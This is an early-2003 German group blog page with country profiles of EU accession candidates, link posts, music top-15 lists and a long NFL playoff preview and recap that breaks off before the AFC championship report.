    Heute ist Polen eine parlamentarische Republik. Staatsoberhaupt ist der Präsident. Das Parlament besteht aus zwei Kammern – dem Abgeordnetenhaus und dem Senat. Die Exekutive liegt beim Ministerrat unter Vorsitz des Premierministers (Leszek Miller). Die Hauptstadt Warschau ist gleich groß wie Wien; ihre gesamte Altstadt steht als Weltkulturerbe unter dem besonderen Schutz der UNESCO.

    Staatspräsident: Aleksander Kwasniewski
    Berühmteste Polen:
    Johannes Paul II. (Papst)
    Roman Polanski (Regisseur)
    Adam Malysz (Skispringer)
    Nikolaus Kopernikus (1473 - 1543) (Astronom)
    Frederic Chopin (1810 - 1849) (Komponist)
    Marie Curie (1867 - 1934) (Physikerin)
    :: LITAUEN  bully  30.01.2003 00:38:29

    Fläche: 65.300km²
    Einwohner: 3,7 Mio.
    Hauptstadt: Vilnius
    Währung: Litas (1 € = 1,10 Litas)
    Religion: 70% Katholiken
    Nationalfeiertag: 16. Februar
    Länderdomain (Top-Level): .lt

    Litauen ist das südlichste und größte der drei baltischen Länder. Das Land ist knapp so groß wie Bayern und größer als z.B. die Schweiz, Belgien oder Dänemark. Litauen grenzt im Westen an die russische Exklave Kaliningrad, was bei den Beitrittsverhandlungen (bezüglich der Visa für durchreisende Russen) zu diplomatischen Verwicklungen führte. Die am Zusammenfluss von Neris und Vilia gelegene Hauptstadt Vilnius ist, was ihren alten Stadtkern betrifft, eine kulturhistorische Sehenswürdigkeit ersten Ranges. 20 Kilometer nördlich von Vilnius liegt der geografische Mittelpunkt Europas. Nach Berechnungen der französischen Akademie für Geographie aus dem Jahr 1989 kreuzen sich auf diesem Punkt die Linien Gibraltar - Ural und Nordkap - Kreta. Bereits 1993 hat der Bildhauer Gintaras Karosas damit begonnen, rund um den Gedenkstein am Mittelpunkt des Kontinents einen Skulpturenpark zu errichten. Heute zählt der Europa-Park zu den größten Ausstellungsflächen. Auf 55 Hektar sind fast 100 Werke von Künstlern aus 22 Staaten zu besichtigen.

    Staatspräsident: Valdas Adamkus
    Berühmteste Litauer:
    Arvydas Sabonis (Basketballer)
    Raimondas Rumsas (Radprofi)
    Valdas Ivanauskas (Fussballer)
    Ausra Fridrikas (Handballerin)
    :: LETTLAND  bully  29.01.2003 16:02:40

    Fläche: 64,589 km²
    Einwohner: 2,4 Mio.
    Hauptstadt: Riga
    Währung: Lat (1 Lat = 1,50 €)
    Religion: 2/3 Protestanten, 1/3 Russisch Orthodox
    Nationalfeiertag: 18. November
    Länderdomain (Top-Level): .lv

    Lettland ist etwas kleiner als Irland und besteht größtenteils aus einer flachen Landschaft mit 3000 Seen und über 12.000 Flüssen. Im Westen des Landes erstrecken sich leichte Anhöhen, bis 180 m über dem Meeresspiegel. Die Geschichte der drei baltischen Staaten ist naturgemäss sehr ähnlich, deshalb verweise ich hier wie auch demnächst beim Kapitel Litauen auf die Geschichte Estlands. Die Hauptstadt Riga ist heute eine vibrierende Stadt mit Spielcasinos und exklusiven Boutiquen, Museen und Galerien, einem bunten Nachtleben ohne Sperrstunde und einer Oper von Weltrang. Der Lat, die im Oktober 1993 eingeführte Währung Lettlands, ist eine der härtesten Währungen der Welt. Lettland ist wie Estland und Litauen heute eine parlamentarische Republik.

    Staatspräsidentin: Vaira Vîke-Freiberga
    Berühmteste Letten:
    DJ Lethal (Limp Bizkit)
    Sandis Prusis (Bobfahrer)
    Arturs Irbe (Eishockey-Tormann)
      bully  28.01.2003 23:21:11
    In den nächsten Wochen werden auf feelosophee.com die 10 EU-Beitrittskandidaten vorgestellt. Den Anfang macht heute Estland.
    :: ESTLAND  bully  28.01.2003 23:19:07

    Fläche: 45.227km²
    Einwohner: 1,4 Mio.
    Hauptstadt: Tallinn
    Währung: estnische Krone (1 € = 15 EEK)
    Religion: 2/3 Protestanten, 1/3 Russisch Orthodox
    Nationalfeiertag: 24. Februar
    Länderdomain (Top-Level): .ee

    Etwas größer als die Schweiz oder Dänemark, grenzt Estland an Lettland und Russland und ist im Norden nur durch eine Meerenge der Ostsee von Finnland getrennt. Die Vorfahren der Esten besiedelten die Ostseeküste vor ca. 5000 Jahren. Estland hat aber durch Jahrtausende seine Sprache und nationale Identität bewahrt. Im 13. Jahrhundert entwickelte sich die Hafenstadt Reval, die heute Estlands Hauptstadt Tallinn ist. Unter deutschen Ordensrittern wurde sie zur führenden Handelsstadt der östlichen Ostsee. Im 16. Jahrhundert stritten sich Polen, Schweden und Russland um die baltischen Hafenstädte. Die darauffolgende russische Herrschaft im 19. Jahrhundert führte zu einer Verarmung, die wiederum Unruhen und Auswanderung mit sich brachte. Nach dem ersten Weltkrieg konnten die drei baltischen Staaten Estland, Lettland und Litauen mehrere Jahre lang als demokratisch regierte Republiken existieren, bis der Hitler-Stalin-Pakt diese 1939 der Sowjetunion zuordnete. Im Jahr 1991 schließlich erlang Estland wieder die Unabhängigkeit. Heute sind 65% der Einwohner Esten und 29% Russen.

    Staatspräsident: Arnold Rüütel
    Berühmteste Esten:
    Erki Nool (Zehnkämpfer)
    Andrus Veerpalu (Langläufer)
    Kristina Smigun (Langläuferin)
    Jens Salumae (Skispringer)
    Carmen Kass (Model)
    :: hurt  sTe  23.01.2003 12:50:45
    hier gibts das video von Johnny Cash´s "Hurt".
    demnaechst 71, ist er darin als der alte, schwer kranke mann zu sehen, der er eben ist;
    trotzallem strahlt das video unglaubliche kraft und wuerde aus!!!
    be sure to check out the other videos too...
    :: beta  sTe  22.01.2003 11:20:43
    time´s up again for a major change! feelosophee is getting new clothes; wanna take a look: feelo2003...hope you like it
    :: curly...  sTe  21.01.2003 11:48:16
    Online curling. This most sedate of Olympic sports gets a soothing online makeover;
    bushy is old, but still funny and curly too :)
    :: saturday afternoon  sTe  18.01.2003 20:25:51
    tried out the new extension kit, works great, but bmw williams sucked...
    :: more geek tools  sTe  18.01.2003 19:12:08
    Persistence Of Vision Fantazein Clock and the Digital Sundial
    :: remote  sTe  16.01.2003 22:48:12
    mich beschaeftigt folgende geschichte: vielleicht kann mir einer der anwesenden juristen helfen: wie kann ein 36 jaehriger, der 17x einschlaegig vorbestraft, nie laenger als ein jahr gesessen haben? die strafe find ich zwar angemessen aber ob sie was bringt, wage ich zu bezweifeln?!? alternativen???
    :: die spinnen, die Emire...  bully  16.01.2003 11:19:23
    General Sheikh Mohammed bin Rashid Al Maktoum, seines Zeichens Kronprinz und Verteidigungsminister der Vereinigten Arabischen Emirate, hat sich ein Monsterprojekt vorgenommen. Er lässt durch die chinesische Eisenbahngesellschaft (Auftragsvolumen 10 Mrd. USD) eine künstliche Insel im Golf von Dubai errichten, die 6 km ins offene Meer hinausragt - Palm Island.
    Die Palmwedel sind gespickt mit pompösen Hotels, Gastronomiebetrieben und Häusern, die jeweils einen langen Strand ihr Eigen nennen können. Am Stamm der Palme sind Einkaufszentren und diverse Wellness-Betriebe untergebracht. Die Privathäuser (oder soll ich eher sagen -tempel) sind alle schon verkauft, neue Staatsbürger der VAE (die Staatsbürgerschaft gibts nämlich gleich gratis dazu) sind unter anderem Michael Jackson und David Beckham. Weitere Palm Islands sollen folgen.
    Neben der chinesischen Mauer und den Pyramiden von Gizeh wird Palm Island das dritte von Menschenhand erbaute Projekt sein, das vom Mond aus sichtbar ist. Das erste also seit 2500 Jahren...
    :: and it burns, burns....  sTe  16.01.2003 10:42:17

    check out this extraordinary, convenient burner;
    :: wow, rooooar & more power  sTe  15.01.2003 16:33:22
    Dodge introduced its Tomahawk V-10, 8.3-liter (505 cubic inch) concept motorcycle at the North American International Auto Show in Detroit on January 6, 2003. The superbike features independent four-wheel suspension, and its engine, borrowed from the Viper sports car, can propel the Tomahawk at speeds of nearly 400 mph, according to Dodge.

    I have to see this puppy in real life !!!
    mr. cab driver  romario11  15.01.2003 12:24:57
    extremely hard but very nice flash game - fifth element is calling
    kuhlympics  babsi  14.01.2003 22:23:49
    sehr niedliches spiel, das auch ein wenig die ergrauten zellen anregt!
    :: icon war  sTe  13.01.2003 13:41:12

    superb flash !!!

    reveal your hobbit name , mine is "Mungo Hardbottle" :)

    superb shockwave
    :: bully´s 2002 top 15   bully  01.09.2003 17:08:21
    01. System of a Down - ATWA
    02. Greg Graffin & Joan Jett - Let´s Do It
    03. Eminem - ´Till I Collapse
    04. Joey Ramone - What A Wonderful World
    05. Red Hot Chili Peppers - Cabron
    06. Adema - Freaking Out
    07. Eminem - Sing For The Moment
    08. Blindside - Pitiful
    09. Queens Of The Stone Age - No One Knows
    10. Slut - Easy To Love
    11. Crazy Town - Drowning
    12. The Vines - Get Free
    13. Bowling For Soup - The Bitch Song
    14. Red Hot Chili Peppers - By The Way
    15. Kernkraft 400 - Zombie Nation (Oddworld 2000 Hardcore Mix)

    is mir sehr schwer gefallen...
    but thx 4 the motivation!!! ;-)
    :: jesus  sTe  01.08.2003 17:07:02
    Jesus´ Wunderheilungen und die Visionen seiner Jünger waren das Ergebnis eines Drogenrausches....more
    :: feelosophees 2002 top 15   sTe  01.06.2003 19:21:44
    01. Queens Of The Stone Age - No One Knows
    02. Nada Surf - Inside of Love
    03. Badly Drawn Boy - Silent Sigh
    04. Red Hot Chili Peppers - By the Way
    05. Foo Fighters - All My Life
    06. Black Rebel Motorcycle Club - Whatever Happened to ...
    07. Disturbed - Breath
    08. Johnny Cash - Hung My Heart
    09. Sneaker Pimps - Sick
    10. Supergrass - Grace
    11. Pearl Jam - Get Right
    12. Bruce Springsteen - The Fuse
    13. Jimmy Eat World - Hear You Me
    14. Starsailor - Poor Misguided Fool
    15. The Vines - Get Free
    :: bye bye  sTe  01.06.2003 13:26:50
    nachdem er uns letztesjahr bis mitte april erfreute, das jahr davor immerhin bis maerz, wurde diesmal unser christbaum fristgerecht und im sinne der stadt wien legal entsorgt...nein, er wurde auch nicht aus dem wintergarten geworfen..
    :: simply cinema  sTe  01.02.2003 18:51:47
    feelosophee laesst sich ab sofort surround beschallen, und zwar von diesen teilen...

    desweiteren gibts ein usb 6 in 1 card lesegeraet zu melden, damit die photos endlich flutschen (good by seriell)

    und der neue esstisch kommt mitte februar...

    fazit: urlaub kann auch ohne wegzufahren teuer werden...
    :: The NFL in January  bully  01.02.2003 14:52:17






    Heimrecht haben immer die Teams mit der niedrigeren Zahl darüber / darunter.

    Beginndaten und -zeiten sind MEWZ.

    Abkürzungen und die wichtigsten Spieler der Teams:
    NFC:
    1. PHI = Philadelphia Eagles (12-4)
    Donovan McNabb #5 (QB), Duce Staley #22 (RB), Todd Pinkston #87 (WR)

    2. TB = Tampa Bay Buccaneers (12-4)
    Brad Johnson #14 (QB), Warren Sapp #99 (DT), Keyshawn Johnson #19 (WR)
    3. GB = Green Bay Packers (12-4)
    Brett Favre #4 (QB), Ahman Green #30 (RB), Donald Driver #80 (WR)
    4. SF = San Francisco 49ers (10-6)
    Jeff Garcia #5 (QB), Terrell Owens #81 (WR), Dana Stubblefield #94 (DT)
    5. NYG = New York Giants (10-6)
    Kerry Collins #5 (QB), Jeremy Shockey #80 (TE), Amani Toomer#81 (WR), Tiki Barber #21 (RB)

    6. ATL = Atlanta Falcons (9-6-1)
    Michael Vick #7 (QB), Warrick Dunn #28 (RB), Brian Finneran #86 (WR)

    AFC:
    1. OAK = Oakland Raiders (11-5)
    MVP!!! Rich Gannon #12 (QB), Jerry Rice #80 (WR), Charlie Garner #25 (RB)
    2. TEN = Tennessee Titans (11-5)
    Steve McNair #9 (QB), Eddie George #27 (RB), Derrick Mason #85 (WR)
    3. PIT = Pittsburgh Steelers (10-5-1)
    Tommy Maddox #8 (QB), Jerome Bettis (The Bus) #36 (RB), Plaxico Burress #80 (WR)
    4. NYJ = New York Jets (9-7)
    Chad Pennington #10 (QB), Curtis Martin (RB), Wayne Chrebet #80 (WR)
    5. IND = Indianapolis Colts (10-6)
    Peyton Manning #18 (QB), Marvin Harrison #88 (WR), Edgerrin James #32 (RB)

    6. CLE = Cleveland Browns (9-7)
    Tim Couch #2 (QB), Quincy Morgan #81 (WR), William Green #31 (RB)


    Hier noch kurz meine Tipps fürs Wochenende:
    die Steelers, die Packers und die beiden New Yorker Teams gewinnen und steigen in die Divisional Playoffs auf. (Auch wenn ich auf die Falcons und die Browns hoffe.)




    WILD CARD GAMES:

    04.01.03, 22.30 Uhr
    COLTS @ JETS: 0-41
    VORSCHAU: Die Offense der Jets (42 Punkte gegen die Packers!!) scheint zur Zeit unstoppable; das werden wohl auch die mit der besseren Saisonbilanz ins Rennen gehenden Colts zu spüren bekommen.
    --------------------
    BERICHT: eine unglaublich starke Vorstellung der Jets!!! Nur grosses Mitleid der Jets und das daraus resultierende Spiel mit angezogener Handbremse in der zweiten Hälfte bewahrte die Colts vor einer +50:0 - Niederlage!!! Ein grundsolider Chad Pennington, ein sehr starker Curtis Martin und eine überragende Defense-Leistung der Jets reichten aus die höher eingeschätzten Colts geradezu in Grund und Boden zu spielen!!!
    REPORT & PHOTOS

    05.01.03, 02.30 Uhr
    FALCONS @ PACKERS: 27-7
    VORSCHAU: Donald Driver, Lieblingsreceiver Brett Favres bei den Green Bay Packers, fällt am Samstag wegen einer Schulterluxation höchstwahrscheinlich aus. Ihr Strong Safety, Darren Sharper, ist definitiv noch immer nicht einsatzbereit. Trotzdem wäre eine Niederlage der Packers wohl die grösste Sensation in der NFL seit vielen, vielen Jahren. Und genau deshalb hab ich darauf gewettet!!!
    --------------------
    BERICHT: HEY, HEY VICKIE... HEY VICKIE, HEY!!!
    WOOOOOOOOOOOOW!!! SEN-SA-TIO-NELL!!!
    Wieviele Serien können eigentlich in einem einzigen Spiel reissen??? Heute Nacht waren es zumindest einige!!! Von den bisherigen 26 Playoffs-Auswärtsspielen von Dome-Teams (Teams, die ihre Heimspiele in einer Halle austragen) haben diese bis jetzt genau 4 gewonnen. Die Green Bay Packers hatten als einziges Team der NFL in dieser Saison alle 8 Heimspiele gewonnen. Brett Favre (Quarterback der Packers) hat in seiner gesamten Karriere alle 35 Heimspiele, die bei unter 4° C begonnen wurden gewonnen. Die Packers haben noch kein einziges Playoff-Heimspiel verloren. Schneesturm und Minusgrade in Wisconsin... und all diese Serien reissen!!! Die Sensation ist perfekt und die Falcons gewinnen hooochverdient im Kühlschrank der Liga!!! Die Gründe dafür sind schnell ausgemacht; ein grandios aufspielender Michael Vick (22 Jahre!!!) und durch und durch erbärmlich agierende Packers...
    noch ganz interessant nebenbei: beide Spiele letzte Nacht standen in der Halbzeit 24-0 ;-)
    REPORT & PHOTOS

    05.01.03, 19.00 Uhr
    BROWNS @ STEELERS: 33-36
    VORSCHAU: Tim Couch, Quarterback der Cleveland Browns, fällt wegen eines Bruchs des rechten Beines für den Rest der Saison aus. Eigentlich spricht leider allein dadurch schon fast alles gegen die Browns.
    --------------------
    BERICHT: ein geradezu unglaubliches Spiel von Kelly Holcomb (QB), dem Vertreter des verletzten Tim Couch mit 429 Yards und 3 Touchdowns reicht zwar zu einer Führung von der ersten bis zur 59. Minuten, in der letzten Minute aber gehen die von einem in der Endphase sehr starken Tommy Maddox geführten Steelers mit 3 Punkten Vorsprund in Führung. Im allerletzten Drive der Browns fehlt ihnen zum Schluss genau eine einzige Sekunde für das Field Goal, das den Ausgleich und die Verlängerung bedeutet hätte. Sehr schade, aber unverdient war der Sieg der Steelers nicht, auch wenn es zwischendurch schon nach einem Kantersieg für die Browns aussah (14-0, 24-7 und 12 Minuten vor Schluss noch 27-14).
    REPORT & PHOTOS

    05.01.03, 22.30 Uhr
    GIANTS @ 49ERS: 38-39
    VORSCHAU: Die Giants kommen mit 4 Siegen in Folge zu den 49ers und sind REALLY REALLY HOT. Wenn die Giants TO (Terrell Owens), den mir unsympatischten Spieler der gesamten NFL, nur halbwegs stoppen können und auch etwas Druck auf Jeff Garcia entwickeln können, sollte einem Auswärtssieg wohl hoffentlich nichts im Wege stehen.
    --------------------
    BERICHT: unglaublich, ich kann es einfach nicht fassen. Die Giants spielen souverän, führen Mitte des 3. Viertels schon quasi uneinholbar mit 38-14 und verlieren in letzter Minute noch 38-39... so etwas darfs doch eigentlich gar nicht geben. 5 Sekunden vor Schluss haben die Giants sogar noch die Chance auf ein Field Goal (zum 41-39) aus 41 Yards, aber der Snap misslingt, und das Spiel ist aus. Ich bin geschockt und enttäuscht...
    REPORT & PHOTOS
    ORF-ON, SPORT1, BILD, CNN, CBS, FOX
    PS: Montag Abend hat sich die NFL und die Vereinigung der Schiedsrichter bei den Giants entschuldigt, da das Spiel gegen die 49ers mit einer Fehlentscheidung zu Ungunsten der Giants geendet hatte. Es waren 2 Fouls im Spiel, die sich aufgehoben hätten und der Field Goal - Versuch hätte wiederholt werden müssen... mehr hier.



    RESUMEE:
    So schön der Samstag auch war mit seinen zwei hochverdienten Siegern, den New York Jets und den Atlanta Falcons, so unbarmherzig und grauenvoll wurde der Sonntag mit dem Ausscheiden der in dieser Saison fantastisch aufspielenden Cleveland Browns und New York Giants. Maybe next year, guys.
    OK, die Steelers haben den Sieg wirklich verdient. Das gleiche über die 49ers zu sagen fällt mir allerdings um einiges schwerer.
    Dieses Wochenende haben wir also sensationellerweise die allererste Playoff-Heimniederlage der Green Bay Packers erlebt und auch den zweitgrössten Comeback-Sieg in der NFL-Playoff-Geschichte durch San Francisco. Der grösste Comeback-Sieg gelang übrigens so ca. 1990 den Buffallo Bills, die schon 3-35 zurücklagen und noch 41-38 gewannen. Die Chancen der jeweiligen Teams, die jetzt noch im Rennen sind werden im Anschluss betrachtet.




    DIVISIONAL PLAYOFFS:

    11.01.03, 22.30 Uhr
    STEELERS @ TITANS: 31-34
    VORSCHAU: Durch diesen Last-Minute-Sieg liegt das Momentum sicherlich bei den Steelers, aber gegen einen Steve McNair in Top-Form und diese überragende Defense der Titans werden die Tugenden vom letzten Wochenende einfach zu wenig sein. Die Pass-Verteidigung der Steelers verdient den Namen eigentlich nicht, und die Titans werden das gnadenlos ausnützen.
    Mein Tipp: TITANS
    --------------------
    BERICHT: Wie vermutet ziehen die Titans ihr Spiel im ersten Viertel eiskalt durch und gehen schnell mit 14-0 in Führung. Durch eine völlig unnötige Interception kurz vor Ende des ersten Viertels aber kommen die Titans aus dem Tritt, die Defense der Steelers konsolidiert sich auf einmal und zur Halbzeit steht es plötzlich nur noch 14-13. In der zweiten Hälfte kommt es zu einem ständigen hin und her, was auch daran liegt, dass die Titans ab dem ersten Spielzug ihren Star-Running Back Eddie George wegen einer Verletzung vorgeben müssen. Und so geht das Spiel mit 31-31 in die Verlängerung. Die Titans gewinnen den coin toss und marschieren unwiderstehlich über das Spielfeld. Und obwohl Joe Nedney, Kicker der Titans, das Field Goal verschiesst, bekommt er wegen eines Fouls eine zweite Chance und trifft nun endlich. War wirklich eine äusserst dramatische Begegnung. Zum Schmunzeln brachte uns auch die Tatsache, dass die Verantwortlichen der Titans kurz vor Ende des Spiel den Pfiff des Schiedsrichters nicht gehört haben und dachten, dass das Spiel durch ein Field Goal für die Titans entschieden war. Das brachte sie natürlich dazu ihr pompöses Siegesfeuerwerk zu starten, das dann auch nicht mehr aufzuhalten war. Und das beim Stand von 31-31.

    REPORT & PHOTOS

    FALCONS @ EAGLES: 6-20
    VORSCHAU: Natürlich könnte man hier sagen ´Wer in Green Bay gewinnen kann, kann überall gewinnen.´. Das wär aber wohl zu kurzsichtig, denn DMac is back!!! Nach einer verletzungsbedingten Pause von 8 Wochen meldet sich Star-Quarterback Donovan McNabb bei den Eagles zurück. Die Läufe von Michael Vick werden sich gegen die Eagles wohl zwangsläufig auf ein Minimum beschränken.
    Mein Tipp: EAGLES
    --------------------
    BERICHT: Eigentlich muss ich sagen, dass die Falcons doch recht lange (6min. vor Schluss: 6-13) brav mitgespielt haben, aber eine Chance dieses Duell zu gewinnen hatten sie nie. Viel zu stark war einfach die überragende Defense der Eagles. Mike Vick hatte mit derart viel Druck zu kämpfen, dass er nur sehr sehr selten seine Qualitäten ausspielen konnte. McNabb war zwar nach seiner Verletzung noch nicht ganz wieder der alte, jedoch brachte er eine grundsolide Leistung. Auch das Laufspiel der Eagles mit Duce Staley funktionierte tadellos, wie aber schon gesagt ist das Prunkstück der Mannschaft aus Philadelphia ganz klar die Defense.
    REPORT & PHOTOS

    12.01.03, 19.00 Uhr
    49ERS @ BUCS: 6-31
    VORSCHAU: Da die 49ers jetzt endlich ausscheiden müssen ;-), ist hier der Sieg der Bucs für mich seeeehr wichtig. Jeff Garcia, San Franciscos QB, wird hier nicht so viel Zeit bekommen seine Pässe an den Mann zu bringen, da die Defense Line der Bucs mit dem überragenden Warren Sapp viel zu viel Druck auf ihn ausüben wird. Die Offense der Bucs ist solide genug den 49ers einige Punkte einzuschenken. Wird wohl ein Spiel mit relativ wenigen Punkten, aber auch ein 16-10-Sieg ist ein Sieg.
    MEIN TIPP: BUCS
    --------------------
    BERICHT: Eine äusserts beeindruckende Leistung der Bucs, WOW!!! Der Demontage der 49ers beizuwohnen war mir ein Volksfest!!! Danke!!!! Ein Spiel mit wenigen Punkte ist es auch geworden, allerdings nur was das Team aus San Francisco betrifft. Die Bucs und da vor allem ihr seit diesem Spiel wieder einsatzfähiger Quarterback Brad Johnson zeigten offensiv eine sehr starke Leistung. Zur Ehrenrettung der 49ers muss ich natürlich schon festhalten, dass beide Cornerbacks verletzungsbedingt fehlten. Dass die Bucs die beste Defense der NFL haben, ist ja nichts Neues, aber ihr Auftreten heute war wiedereinmal eine Galavorstellung; zwei Field Goals im ersten Viertel, mehr Punkte wollten die Bucs einfach nicht zulassen.
    Die 49ers sind ab sofort im Urlaub, und genau da gehören sie auch hin.
    REPORT & PHOTOS

    12.01.03, 22.30 Uhr
    JETS @ RAIDERS: 10-30
    VORSCHAU: DAS Match-Up des Wochenendes, wow!!! Zwei Offensiv-Feuerwerke treffen aufeinander!!! Viele Punkte sind zu erwarten!!! Wer hier gewinnt, ist mein absoluter Superbowl-Favorit!!! Rich Gannon, diesjähriger MVP gegen den extrem coolen jungen Chad Pennington. Nach 3 Siegen in Folge, gegen die Patriots (Titelverteidiger) (30-17), die Packers (42-17) und am Samstag gegen die Colts (41-0) gehen die Jets mit stolzgeschwellter Brust in diese Begegnung. Da es in Oakland im Jänner oft regnet, hat Gannon im letzten Spiel der Regular Season erstmals in seiner Karriere mit Handschuhen gespielt und einen sehr starken Eindruck hinterlassen. Für die Raiders spricht natürlich auch der Heimvorteil; das Black Hole wird dermassen laut werden, dass die Jets die PlayCalls ihres Quarterbacks nur sehr schwer hören werden können. Eine Voraussage hier ist fast unmöglich. Beide Teams haben absolut das Zeug dazu jeden Gegner ganz klar abzufertigen! Für die Raiders ist es wohl heuer für einige Jahre die letzte Chance die Superbowl zu gewinnen; erstens wegen des Salary Caps und zweitens wegen des doch recht fortgeschrittenen Alters der Stützen der Mannschaft (Gannon wird in 2 Wochen 37, Tim Brown ist ebenfalls 36, Jerry Rice ist 40, Bill Romanowski wird im Februar 37 und Ron Woodson im März 38). Gerade deshalb werden die Raiders 100% und mehr geben um sich heuer den Traum des Superbowl-Siegs zu erfüllen. Aber natürlich sind die jungen Jets ebenso heiss...
    Letztes Spiel der Jets: 41-0 gegen die Colts
    Letztes Spiel der Raiders: 24-0 gegen die Chiefs
    MEIN TIPP: JETS
    --------------------
    BERICHT: wow, ein lange Zeit sehr spannendes Spiel wird im letzten Viertel doch noch eine klare Angelegenheit... Congratz to the Raiders!!!
    Irgendwie ist es schon auch schade um die Jets, aber sie haben die Zukunft noch vor sich. In diesem extrem intensiven Spiel hatte Chad Pennington wohl heute den schlechtesten Tag seiner (noch so jungen) Karriere. Zwei Interceptions, zwei Fumbles und sehr viele unpräzise Pässe. Trotzdem bin ich der Meinung, dass man ihm überhaupt keinen Vorwurf machen kann; die Coverage der Raiders war heute einfach fantastisch, gegen dieses Team zu verlieren ist wirklich keine Schande! Lange stand es hier 10-10, aber am Ende setzte sich das physisch klar überlegene Heimteam noch recht deutlich durch. Die Jets haben heuer deutlich mehr erreicht als irgendwer von ihnen erwarten konnte, und für die Raiders endet diese Saison wohl erst in zwei Wochen in San Diego!!!!YES!!!!

    REPORT & PHOTOS



    RESUMEE:
    Die grösste Überraschung dieses Wochenendes war wohl, dass es keine Überraschung gab. Die jeweils an eins und zwei in ihrer Conference gesetzten Teams gewinnen durch die Bank ihre Heimspiele.




    CONFERENCE CHAMPIONSHIPS:




    NFC:

    19.01.03, 21.00 Uhr (live auf TW1):
    BUCS @ EAGLES: 27-10
    VORSCHAU: Puuh, das wird eine harte Partie. Ganz ganz schwer zu sagen. Die beste Verteidigung der NFL zu Gast bei der zweitbesten. Bis vor den Divisional PlayOffs hätt ich ganz klar gesagt, dass die Eagles das gewinnen. Die Defenses bleiben einander nichts schuldig und offensiv sind die Eagles klar überlegen. Letztes Wochenende sah das ganze aber etwas anders aus. Bei beiden Teams kamen die Starting Quarterbacks nach verletzungsbedingten Pausen zurück. Während ich bei Brad Johnson (Bucs) den Eindruck hatte, dass er nicht nur wieder der Alte ist sondern besser denn je, konnte ich diesen Eindruck bei Donovan McNabb (Eagles) nicht gewinnen. Seine Beweglichkeit schien noch nicht wieder in vollem Ausmass da zu sein. Deshalb würd ich offensiv einen kleinen Vorteil bei den Bucs sehen. Was die nach einer Saison unter Head Coach Jon Gruden "dazugelernt" haben, ist fast unglaublich. Nun zur Defense. Auch hier würd ich einen kleinen Vorteil bei den Bucs sehen, die Stärke der D-Line ist ungefähr gleich, allerdings sind die Bucs etwas schneller und beweglicher. Die Secondaries sind ungefähr gleich gut. Ein extrem wichtiger Faktor in diesem Spiel ist allerdings der Heimvorteil. Geradezu traditionell verlieren die Bucs im Winter in kalten Gefilden. Viel hängt hier also vom Wetter ab. Noch dazu spielen die Eagles auf Turf, was den Bucs auch noch nie sympatisch war. Bei Plusgraden und Sonnenschein würd ich auf die Bucs tippen, allein schon, damit es eine Woche später zur Pirate Bowl kommt!!! Viel Glück den Bucs, aber
    MEIN TIPP: EAGLES
    --------------------
    BERICHT: Wow, die Bucs habens wirklich geschafft!!!
    Die Überraschung ist perfekt!!! Noch nie seit der Vereinsgründung haben die Tampa Bay Buccaneers bei Minusgraden ein Spiel gewonnen, doch irgendwie ist diese Saison alles anders... Zwar begann das NFC-Finale mit einem Eagles-Feuerwerk; noch bevor die erste Minute vergangen war, stand es schon 7-0 für das Heimteam durch einen TD-Lauf von Duce Staley. Doch dieser Touchdown der Eagles sollte, was zu diesem Zeitpunkt wohl noch keiner geahnt hätte, der einzige für Philadelphia im gesamten Spiel bleiben. Völlig unbeeindruckt vom Rückstand marschierten die Bucs ebenfalls übers Feld und kamen bei deren erstem Drive ihrerseits zu den ersten Punkte. Das 3-7 sollte aber nur der Auftakt einer nahezu perfekten Offensivleistung der Jungs aus Tampa sein. Von diesem Zeitpunkt an hielt auch die Defense der Bucs trotz einer kurzen Verletzungspause Warren Sapps grandios. Gleich im zweiten Drive gelang Joe Jurevicius ein 71-yard Catch, der den Touchdown von Mike Alstott vorbereiten sollte. Für meinen Geschmack war das Play-Calling von Andy Reid (Headcoach der Eagles) spätestens ab diesem Zeitpunkt viel zu konservativ. Offensiv wurde nur mit Läufen durch die Mitte und kurzen Passes aus der Pocket agiert und so war es für die auch gestern wieder phantastische Defense der Bucs ein Leichtes die Eagles zu stoppen. So gut wie nie wurden die Lauffähigkeiten von McNabb, der allerdings gestern auch nicht seinen besten Tag hatte, ausgenützt. Nur ein einziges Mal wurde versucht tief zu gehen, und das misslang. Aber auch defensiv waren die Eagles einfach schwach und einfallslos. Auf Brad Johnson (QB der Bucs) wurde eindeutig zu wenig Druck ausgeübt; in der gesamten ersten Hälfte blitzten die Eagles nur zweimal!!! Derart unbedrängt war es für diesen nicht sehr schwer immer öfter auf Keyshawn Johnson zu passen, der dann nach einem FG der Eagles auch das 17-10 erzielen konnte – Halbzeit. Abgesehen von einem weiteren Fieldgoal der Bucs entwickelte sich die zweite Hälfte zur erwarteten Abwehrschlacht. Beim Stand von 20-10 versuchten die Eagles wenige Minuten vor Schluss noch einmal alles, doch ein Interception-Return-Touchdown von Ronde Barber (Cornerback der Bucs), der auch davor schon einige grandiose Defense Plays hatte, über 92 Yards drei Minuten vor Schluss besiegelte die 27-10-Niederlage der Eagles. Das Veteran Stadium hat im allerletzten Spiel seinen ganzen Schrecken verloren und kann nun getrost gesprengt werden. Die Bucs und ihr Headcoach Jon Gruden ziehen dank einer wie immer grandiosen Defense und einer überraschend starken Offensivleistung vollkommen verdient in den Superbowl XXXVII ein.
    REPORT & PHOTOS

    NFC CHAMPIONS:
    TAMPA BAY BUCCANEERS







    AFC:

    20.01.03, 00.30 Uhr (live auf TW1):
    TITANS @ RAIDERS: 24-41
    VORSCHAU: GOOOOOOO RAIDEEEEERS!!!
    Dies sollte eigentlich eine klare Angelegenheit werden. Zwar wurde Steve McNair (Quarterback der Titans) im Dezember zum AFC Offensive Player of the Month gewählt, aber die Raiders sind für die Titans wohl doch eine oder mehrere Nummern zu gross. Die beste Offense der gesamten NFL mit dem MVP der Liga Rich Gannon (QB der Raiders) wird mit den Titans (hoffentlich) kaum Probleme haben. Ob Eddie George, Running Back der Titans, nach seiner Verletzung im Spiel gegen die Steelers wieder zum Einsatz kommen wird ist noch fraglich, aber eher wahrscheinlich. Die Defense der Titans ist jener der Raiders sicherlich etwas überlegen, aber ob sie auch die rollenden Angriffe der Raiders stoppen kann, mag doch sehr bezweifelt werden. Schon einmal kam es in dieser Saison zu einem Aufeinander-
    treffen der beiden Teams; in Woche 4 setzten sich die Raiders klar und deutlich mit 52-25 durch.
    MEIN TIPP: RAIDERS
    --------------------
